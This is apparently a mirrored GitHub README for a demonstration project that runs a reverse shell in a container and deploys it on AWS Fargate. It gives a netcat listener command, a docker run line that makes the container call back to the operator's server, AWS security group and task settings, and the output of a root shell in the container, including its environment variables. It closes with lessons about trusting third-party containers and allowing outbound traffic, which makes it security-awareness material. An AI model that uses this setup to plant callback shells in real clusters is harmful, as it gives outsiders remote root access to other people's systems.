云主机>> reverse_shell>> 返回
项目作者: ayeks

项目描述 :
Run a simple reverse shell in a container and deploy it on AWS Fargate.
高级语言: Dockerfile
项目地址: git://github.com/ayeks/reverse_shell.git
创建时间: 2020-05-01T16:28:06Z
项目社区:https://github.com/ayeks/reverse_shell
开源协议:MIT License
下载


Reverse Shell Container

size
pulls
automated
image-size
license

Run a container which connects back to a server with a reverse shell.

Usage of the remote shell container

Follow these steps to connect back to a shell from within a container.

Start the server

The reverse shell in the container will connect back to your server.
Open up a port with the following snippet:

  1. nc -lvvp 6666

optional: Build the image

  1. docker build -t ayeks/reverse_shell:latest .

Execute the image

Run the reverse shell container with: docker run --rm -it -e IP=192.168.178.26 -e PORT=6666 ayeks/reverse_shell

Start the reverse shell container in AWS Fargate

We all run 3rd party components in our kubernetes clusters but couldn’t
care less about it. This example shows how to setup the reverse shell
as a Fargate Container and how it connects back to an EC2 server.

Setup the AWS Security Groups

Create a reference security group for the container which we will allow
as ingress at our server.

  • Security Group Name: sg_reverse_shell_reference
  • Inbound Rules: none
  • Outbound Rules:
    • All traffic All All 0.0.0.0/0

Create a security group for your server that allows you to connect to it via
SSH from home and with the reverse shell from the container.

  • Security Group Name: sg_server
  • Inbound Rules:
    • All TCP TCP 0 - 65535 sg-RANDOMNUMBER(sg_reverse_shell_reference)
    • SSH TCP 22 YOUR_PUBLIC_IP/32
  • Outbound Rules: all TCP, all IPs:
    • All traffic All All 0.0.0.0/0

Setup the AWS EC2 server

Just choose a EC2 machine that you like. Attach the securitygroup
sg_server to this machine. Start the server and connect to it via SSH.

Create a new container tasks definition

Create a new task definition for the reverse shell container. Only add the
necessary information.

  • Task Definition Name: reverse_shell
  • Task Memory: 0.5GB
  • Task CPU: 0.25 vCPU
  • Container Definition:
    • Container Name: reverse_shell
    • Image: ayeks/reverse_shell
    • Memory Limit: Soft limit 400
    • Environment Variables:
      • IP - your servers internal IP adress
      • Port - 6666

Start the reverse shell container in AWS ECS

Before you run the task make sure that you listen for the container at your server:

  1. nc -lvvp 6666

Now go to your cluster and hit run task:

  • Launch Type: Fargate
  • Task Definition: reverse_shell
  • Cluster VPC: your favourite VPC
  • Subnets: your favourite subnet
  • Security Groups: edit and select the existing: sg_reverse_shell_reference
  • Auto-assign public IP: Enabled <- without that you cannot pull the image from Docker hub

As a result the container should connect back to your server. You are now able to execute commands directly in the container, eg. uname -a:

  1. [ec2-user@ip-172-31-39-189 ~]$ nc -lvvp 6666
  2. Ncat: Version 7.50 ( https://nmap.org/ncat )
  3. Ncat: Listening on :::6666
  4. Ncat: Listening on 0.0.0.0:6666
  5. Ncat: Connection from 172.31.2.37.
  6. Ncat: Connection from 172.31.2.37:56656.
  7. bash: cannot set terminal process group (1): Inappropriate ioctl for device
  8. bash: no job control in this shell
  9. root@ip-172-31-2-37:/# uname -a
  10. uname -a
  11. Linux ip-172-31-2-37.eu-west-1.compute.internal 4.14.158-129.185.amzn2.x86_64 #1 SMP Tue Dec 24 03:15:32 UTC 2019 x86_64 GNU/Linux

Just printing the environment variables.

  1. root@ip-172-31-2-37:/# env
  2. env
  3. AWS_EXECUTION_ENV=AWS_ECS_FARGATE
  4. HOSTNAME=ip-172-31-2-37.eu-west-1.compute.internal
  5. AWS_DEFAULT_REGION=eu-west-1
  6. AWS_REGION=eu-west-1
  7. PWD=/
  8. PORT=6666
  9. HOME=/root
  10. IP=172.31.39.189
  11. ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/b9fa9196-e49a-4140-ae3b-bd7322cfbd44
  12. SHLVL=2
  13. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  14. _=/usr/bin/env

Or after installation with apt-get, you can run lshw:

  1. root@ip-172-31-2-37:/# lshw
  2. lshw
  3. ip-172-31-2-37.eu-west-1.compute.internal
  4.   description: Computer
  5.   width: 64 bits
  6.   capabilities: smp vsyscall32
  7.   *-core
  8.      description: Motherboard
  9.      physical id: 0
  10.    *-memory
  11.       description: System memory
  12.       physical id: 0
  13.       size: 4GiB
  14.    *-cpu
  15.       product: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz
  16.       vendor: Intel Corp.
  17.       physical id: 1
  18.       bus info: cpu@0
  19.       width: 64 bits
  20. ...

Troubleshooting

If your container task does not reach the state RUNNING but goes
into STOPPED have a look the reason. If the container is not able to
connect to your server it just dies and returns Exit Code 1.
Check the security groups and other networking topics if that happens.

Lessons Learned

  • think twice before using random containers from the internet
  • do not assume you are save, just because you dont allow ingress traffic
  • do not run the container as root user because you install interesting software with it
  • strip the container base image down as much as possible to reduce available tools